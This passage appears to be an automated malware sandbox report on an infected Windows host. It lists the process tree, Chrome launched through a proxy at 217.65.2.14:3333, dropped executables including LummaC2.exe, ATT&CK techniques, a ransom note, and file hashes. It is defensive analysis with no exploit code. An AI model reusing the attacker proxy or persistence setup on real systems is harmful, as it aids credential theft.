      "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --proxy-server=217.65.2.14:3333 --mojo-platform-channel-handle=1584 --field-trial-handle=1360,i,14161722151807392505,18163019003393019404,131072 /prefetch:8
      4⤵
      PID:5240
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
      "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2296 --field-trial-handle=1360,i,14161722151807392505,18163019003393019404,131072 /prefetch:1
      4⤵
      PID:2496
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
      "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2304 --field-trial-handle=1360,i,14161722151807392505,18163019003393019404,131072 /prefetch:1
      4⤵
      PID:4560
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
      "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1372 --field-trial-handle=1360,i,14161722151807392505,18163019003393019404,131072 /prefetch:2
      4⤵
      PID:5224
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
      "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3632 --field-trial-handle=1360,i,14161722151807392505,18163019003393019404,131072 /prefetch:1
      4⤵
      PID:6412
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
      "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3660 --field-trial-handle=1360,i,14161722151807392505,18163019003393019404,131072 /prefetch:1
      4⤵
      PID:1920
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
      "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3960 --field-trial-handle=1360,i,14161722151807392505,18163019003393019404,131072 /prefetch:1
      4⤵
      PID:6732
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
      "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=1264 --field-trial-handle=1360,i,14161722151807392505,18163019003393019404,131072 /prefetch:1
      4⤵
      PID:1332
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
      "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --proxy-server=217.65.2.14:3333 --mojo-platform-channel-handle=2280 --field-trial-handle=1360,i,14161722151807392505,18163019003393019404,131072 /prefetch:8
      4⤵
      PID:6816
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
      "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=632 --field-trial-handle=1360,i,14161722151807392505,18163019003393019404,131072 /prefetch:1
      4⤵
      PID:4688
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
      "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=2984 --field-trial-handle=1360,i,14161722151807392505,18163019003393019404,131072 /prefetch:1
      4⤵
      PID:8728
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
      "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3124 --field-trial-handle=1360,i,14161722151807392505,18163019003393019404,131072 /prefetch:1
      4⤵
      PID:5760
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
      "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=1444 --field-trial-handle=1360,i,14161722151807392505,18163019003393019404,131072 /prefetch:1
      4⤵
      PID:8612
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
      "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3472 --field-trial-handle=1360,i,14161722151807392505,18163019003393019404,131072 /prefetch:1
      4⤵
      PID:5392
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
      "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3692 --field-trial-handle=1360,i,14161722151807392505,18163019003393019404,131072 /prefetch:1
      4⤵
      PID:5780
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe"
  2⤵
  PID:4356
- - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
    C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
    3⤵
    PID:6964
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
      C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7feee889758,0x7feee889768,0x7feee889778
      4⤵
      PID:5828

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x48c
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2816

C:\Windows\system32\taskeng.exe
taskeng.exe {52287961-D2E8-42EC-8C8F-2CFEA36D6FB9} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
PID:2056
- C:\ProgramData\fjclfj\mlphnb.exe
  C:\ProgramData\fjclfj\mlphnb.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1656
- C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
  "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2432
- C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
  "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  PID:2488
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  PID:6728
- C:\Users\Admin\Windows.exe
  C:\Users\Admin\Windows.exe
  2⤵
  PID:6784

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2624

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-181489685-17028183442052398729149431540-121110423813641607621768986540812274104"
1⤵
PID:916

C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe
"C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe" -service -lunch
1⤵
PID:3524
- C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"
  2⤵
  PID:3468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Direct Volume Access

T1006

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Authentication Process

T1556

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\GET_YOUR_FILES_BACK.txt

Filesize
1011B

MD5
01188d22b1675e3437b1418e14f4ffab

SHA1
6e7127f3bbfce49485ed8f1acf8f697bcb952818

SHA256
e4b3ac00a0b2eb195b26abffbc4368077384e73393e51605edda17dae05ab7f2

SHA512
6903ae3247f32ad79c60a2062cd6a7bdbf5a7c9db1bdc43bdbef4da3396945014d30968ea4c8531a2d0c7b695f1ea36e2b8c51bb39cc6157c4096ac04a6e187d

Download Submit
C:\ProgramData\CFHCGHJDBFII\GCBGCG

Filesize
11KB

MD5
94067499fbd02100ac23247c674e1afa

SHA1
eee77753c0c394911839d43bb41ae003f9185cac

SHA256
0f1fde55ef1b4bcd4ba8ca06804dee6f0b2b798e864164082a4d73c959354ed1

SHA512
74f0ba0056dc17715d2d09af9dbb112a446e42592c0f5603bcc696b4af1b6f0db77b9a88bf6fee550f59df5f46765240f8d6f47ddac1f7f95aa19e92c3c8299f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
59ff63edff40981ee4a082608aff8183

SHA1
53ebe6381ed24c9e8dc3c4996f5c29e4f982ab24

SHA256
66ad0a483efd10554573e45ecb547843c9e77fb71d8c993c278cf69536261c85

SHA512
5434fd2eea08328e6ef9ae3878eac837f3919474c882b36c9ac3412f88989c144392556de17e2cde003e8e824cbd8d87295392ce35499ee4a7b223666275a977

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
0b40a81b88d526127b28316685ab4c20

SHA1
2b02cdd7e74853f85217fd36ae6f91941656417d

SHA256
c567b323ea670ad8e12457e1f02fc042ce1fb599963ba91cc0448d9d16561e8f

SHA512
ef93ec5c0f73c0af8d9f6c8940cd245a5db4aa2a91f76b2841b3424d176944b3c9ada327a97b62e9098f0a441f1f04b24e1c972c451d00c291f56b308aad7794

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
15ab9fc9739f6ef3df235e91639484f6

SHA1
1c07744440d5963e1966aa8a08182fb3d8b9ecc3

SHA256
f7b955989daf36e59382db6c5bf6da97caf24d163f31db9d8fef40aab9651c5c

SHA512
966191247efbda90c42609f366bc6e66fcb6cd46f01ec17bbc9ab591e367a6e4dec7a2b0d7fc725b1df1609ad2d43f4cb8da57782de38cf3983ffdf79b01231f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
107db84bb2b53c318f77297508e76b8e

SHA1
7e3ba8b90e2a26b29dc564b63ab609746cae5dc4

SHA256
cbb4de19f786a7209c5ccb25f59ac1e559cb0846b1c9cc216ddc21373032bf42

SHA512
2d51dad4b815253a34fecd57b7612aaab2de746c5af6d3bfba79f983fe90bc3fe32cd28ca043fb46d79c77022f0086abe14057483982481e17981372b1d58845

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
9b1c99d5245940563e9e81e95c4832ec

SHA1
1bc5970a797d7160879f1ab93559a23b736a2ce7

SHA256
5e5e2d6ab15529a13c5f6fddf4908f82199df64cd0fff65ec624e324f6f20a45

SHA512
6d270d67927d391ddb39f5f2c3bbcbe36add45dc5cbf35099b0876b1b1c91f7ff23389e564bdf583fb4245984cd0a8af8f75ef87695296a8dc1d91269763b957

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\487a4cda-9de3-43fa-bb3a-9095a1afb609.tmp

Filesize
5KB

MD5
89b37f4a9241be6b7bc4a7950ad7d844

SHA1
f1960197059f7fcf6f3546368dada96cfa518331

SHA256
9630f5b6f7270140bb2db91c78c00a128db20dac10e12130496cd0884f9fbbea

SHA512
1b6ef7d4e80c67536cbfcf67a66e1e727076c8027c69f7a15e588cbd3e7e5745a93eb6a630e537562f5f805bd6d21281a8c35219022191365c336e06e1a848be

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
4KB

MD5
0e53ac0ff28026766150b22217c035a8

SHA1
4fa230083d2788ff982fde5004be811cd830e2c6

SHA256
f0d07f85e54ecdd041352cb8a2e1d759e5e79e50427f7335a4c6b5d2f6d30ba4

SHA512
60cf6dfd763ef36a29ac731b737fef50684471dd6034ad5bcd5b0a6f4d1f15cce073a3e5f610beb2dc6ef337b2f545bfa38a3f54c79950dca76096e67a550fff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
4KB

MD5
151680209e02567a275e3d832d8956b5

SHA1
4808e71b1014bf4ae935a40fc1f8b75d40c8d557

SHA256
0b14e4c92c7d89a71d699dc3eebe7be5c0490f0664c0a05eff1eb06a66a5161e

SHA512
4e29511d346d270acbd47e3eaa895d00c8294bdc751a2bc6591af11db1775ba682d329c46a86be2c5a61ac56abc5192a405078fa9a21d42cc3a5262deafc6a11

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
d804752ca7246911f55374ea661df4cc

SHA1
2f12ffb370893bc506c429cff8970a13b90b8d94

SHA256
f7b830426dad4dfda7396fe9eae4c5ca38a77dc644f7b74eceb7a406d3b00a63

SHA512
926f9bffb46d93a6b1daf3ce7d3ef4a80d6e30c4b1e9b5b95f282553e0716d732d792b501e6612410a1cde79749b7c218490ddbd11c71b3bddcbce3147c4a1a5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
4KB

MD5
78349b2dce4cc2a65df8242c9a79c5df

SHA1
208a7fa773bb99d14c2a182408264d92e4fb6eba

SHA256
d332d670e79269f62fdd64aba32c1f9274f2bb35b494ca8d64a2da148ea4f7e4

SHA512
556c9bfda63a35bdf3d3279afc94ed2081593507c5512e27dae5ee430a858d82d5ae2a20fa7744ac994b009168ca0bf463bf81e957ba2452c1c694ca33dcaf51

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
ec6383c4f95c2808ce74eb412e6d310f

SHA1
aaaba6be8299e68a5fa21e8eb9ea9a8e88d4b943

SHA256
34192f327879c16786b0e5d7d42419df11b13f1d6d286fe57a6d90534e449928

SHA512
38ff27365fb8bc0ac231865683414bf1fd273aeacd03219b31e61560f1d0ab17fb0bca3ae9d2f256a3badea421136288e87ccfab8acdb125de4eb956689219f0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

Filesize
16B

MD5
18e723571b00fb1694a3bad6c78e4054

SHA1
afcc0ef32d46fe59e0483f9a3c891d3034d12f32

SHA256
8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

SHA512
43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000009.dbtmp

Filesize
16B

MD5
979c29c2917bed63ccf520ece1d18cda

SHA1
65cd81cdce0be04c74222b54d0881d3fdfe4736c

SHA256
b3524365a633ee6d1fa9953638d2867946c515218c497a5ec2dbef7dc44a7c53

SHA512
e38f694fd6ab9f678ae156528230d7a8bfb7b59a13b227f59f9c38ab5617db11ebb6be1276323a905d09c4066a3fe820cf58077ab48bf201f3c467a98516ee7a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000010.dbtmp

Filesize
16B

MD5
60e3f691077715586b918375dd23c6b0

SHA1
476d3eab15649c40c6aebfb6ac2366db50283d1b

SHA256
e91d13722e31f9b06c5df3582cad1ea5b73547ce3dc08b12ed461f095aad48ee

SHA512
d1c146d27bbf19362d6571e2865bb472ce4fe43dc535305615d92d6a2366f98533747a8a70a578d1f00199f716a61ce39fac5cab9dd67e9c044bc49e7343130e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
176KB

MD5
e6204c3dbdb27116a0e4292606c2dded

SHA1
030adda88bbad0ba816c2d5be4664a8b6ef426cc

SHA256
be6409c45b330ab04958651e4c0ef4cef88237b8aa7b0ce6fc707561acf26352

SHA512
e334a2df32b6a940545d4f52eab95a11fec03265b4f1fae85358dc84bdc5f0418bf574b92eb320a8c31c5bf3d8cd8f1d639bb294aadd56d09a7ed361545ce0bd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
176KB

MD5
4d3feac7c04eaa13c1e72424f3a0d4ee

SHA1
e1d2ac77eaa1081ec57c8b9cf42000d4e675a8fc

SHA256
2254d9a445b1e12ea36cbe348ac7f835952163a77ee92a9a491e540129dd1753

SHA512
1e3d2f3dd3f44447875b2c2b425f0b695268447c615705b3a82071cf39e9ef3933fdf5bb8b90a319fbe20be88a64a11334abde012dc483b39a3dd9b685e27db2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
176KB

MD5
19d4eb6bf57d1d28bc8f55eca261596c

SHA1
4fdff5c654dd4a1df7c0d196588857848223afae

SHA256
8f3dc2b3dc1fbc58e9db46289e45cfd3b6101a312ceb8a0d70b5b67dcc25e681

SHA512
053616d5f01b2fbd90022bf0f28d933851d18108915cdb5ad633c50e8e50de1607cf4ea684a04462ca0430654163da12aa00dcd4a0910c26ecc034672b809260

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7BCOPU31\3[1]

Filesize
49KB

MD5
d66a021c5973288cbddc24f25cbe7ff5

SHA1
19c192afbf1d0205b2ef3b21f1eaf79b2de7bd7d

SHA256
0addd61d01ea1b70f07eafcb6686f3373a320d09440e217f5b3ae9beb479bc46

SHA512
08a5ce796fb4ecbead56f5ca84a3154ef956850a7ef5329e3e5334a954702ef931ed995ac6782c3816210e710770a5a5407df8416182d14cd9f047d0480b6b7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DUME8XYE\4[1]

Filesize
10KB

MD5
2266f0aecd351e1b4092e82b941211ea

SHA1
1dced8d943494aa2be39ca28c876f8f736c76ef1

SHA256
cbbad0ab02cd973c9c4e73336e3bcd0849aeb2232a7bdbc38f0b50696b5c28c3

SHA512
6691cd697bbe7f7a03d9de33869aab289d0a1438b4ee194d2047ded957a726b1d3fe93f08e4a0c677018b20e2521aeb021ab1dc4d1a67927604829ddfd9d59aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NT668XG4\2[1]

Filesize
8KB

MD5
39f45edb23427ebf63197ca138ddb282

SHA1
4be1b15912c08f73687c0e4c74af0979c17ff7d5

SHA256
77fbb0d8630024634880c37da59ce57d1b38c7e85bdcc14c697db9e79c24e0de

SHA512
410f6baad25b256daebfa5d8b8a495429c9e26e7de767b2a0e6e4a75e543b77dbd0abca0335fb1f0d91e49e292b42cedc6edd72d25a3c4c62330e2b31c054cc6

Download Submit
C:\Users\Admin\AppData\Local\Temp\1129321710.exe

Filesize
8KB

MD5
cb8420e681f68db1bad5ed24e7b22114

SHA1
416fc65d538d3622f5ca71c667a11df88a927c31

SHA256
5850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea

SHA512
baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\14106099.exe

Filesize
10KB

MD5
96509ab828867d81c1693b614b22f41d

SHA1
c5f82005dbda43cedd86708cc5fc3635a781a67e

SHA256
a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744

SHA512
ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\1453813444.exe

Filesize
49KB

MD5
6946486673f91392724e944be9ca9249

SHA1
e74009983ced1fa683cda30b52ae889bc2ca6395

SHA256
885fbe678b117e5e0eace7c64980f6072c31290eb36d0e14953d6a2d12eff9cd

SHA512
e3241f85def0efefd36b3ffb6722ab025e8523082e4cf3e7f35ff86a9a452b5a50454c3b9530dfdad3929f74a6e42bf2a2cf35e404af588f778e0579345b38c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\2650731214.exe

Filesize
108KB

MD5
1fcb78fb6cf9720e9d9494c42142d885

SHA1
fef9c2e728ab9d56ce9ed28934b3182b6f1d5379

SHA256
84652bb8c63ca4fd7eb7a2d6ef44029801f3057aa2961867245a3a765928dd02

SHA512
cdf58e463af1784aea86995b3e5d6b07701c5c4095e30ec80cc901ffd448c6f4f714c521bf8796ffa8c47538bf8bf5351e157596efaa7ab88155d63dc33f7dc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\719580\Optimum.pif

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab9F2.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Confirmed.cmd

Filesize
21KB

MD5
aa910cf1271e6246b52da805e238d42e

SHA1
1672b2eeb366112457b545b305babeec0c383c40

SHA256
f6aeee7fbc6ce536eef6d44e25edf441678d01317d0153dd3bda808c8c0fd25c

SHA512
f012780499c4a0f4bf2a7213976f66ec1769cf611d133f07204c2041b9d6804875b50e37e42feb51073868d5de503e35abbef4682c3191ae0a7b65ff14a64a07

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\LummaC2.exe

Filesize
303KB

MD5
9b3eef2c222e08a30baefa06c4705ffc

SHA1
82847ce7892290e76be45b09aa309b27a9376e54

SHA256
8903d4bfe61ca3ca897af368619fe98a7d0ee81495df032b9380f00af41bbfc7

SHA512
5c72c37144b85b0a07077243ffe21907be315e90ba6c268fdb10597f1e3293e52a753dccbfd48578871a032898677c918fa71dc02d6861e05f98f5e718189b73

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\client.exe

Filesize
13KB

MD5
9579af96367447427b315b21b8adde36

SHA1
b26ecdb467ea4c9d233a95ff2fc4b8fe03fb20b3

SHA256
0e102ff9e7499b9f30e22129983c60b70f993058f4bbd6d7cc54799a66300205

SHA512
6ac8dd2001954c282d6020a65d1944b253df6819464435b0f5c124330b2df8962b3cb40c3565a6ff9b31c2985012bff69c3e3091da6e4dbc788bc71ab62dcf67

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\kill.exe

Filesize
13KB

MD5
789f1016740449ce3e9a7fe210383460

SHA1
e0905d363448178d485ed15ee6f67b0f1d72e728

SHA256
71068065d8dd7daa9c49687b973d05d5602ed994467728763d2213fe4d90c0d8

SHA512
b63467a55f11f8e3e6dfee195e5a64d7dec621834e1c26e1f64210496dbad36409771968a5e3b2f142fb6196df5689c012f5971ca2fd4bb3b1311f8f66f2f2fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\pi.exe

Filesize
83KB

MD5
06560b5e92d704395bc6dae58bc7e794

SHA1
fbd3e4ae28620197d1f02bfc24adaf4ddacd2372

SHA256
9eaaadf3857e4a3e83f4f78d96ab185213b6528c8e470807f9d16035daadf33d

SHA512
b55b49fc1bd526c47d88fcf8a20fcaed900bfb291f2e3e1186ec196a87127ed24df71385ae04fedcc802c362c4ebf38edfc182013febf4496ddeb66ce5195ee3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\random.exe

Filesize
2.8MB

MD5
6a3268db51b26c41418351e516bc33a6

SHA1
57a12903fff8cd7ea5aa3a2d2308c910ac455428

SHA256
eaebfc5e60378bbc47a603ca1310440c290a396cb2446de36ff6e7afb624ee0c

SHA512
43f257dbb7e444355e29a8023e8c8838c9e0ca7538a86c25ac41db1e0308bf73c3adda1b0fe5d0bcf536387b9ce5f8fed216f5f7d92c80bcc12e7bffde979b33

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\t2.exe

Filesize
84KB

MD5
a775d164cf76e9a9ff6afd7eb1e3ab2e

SHA1
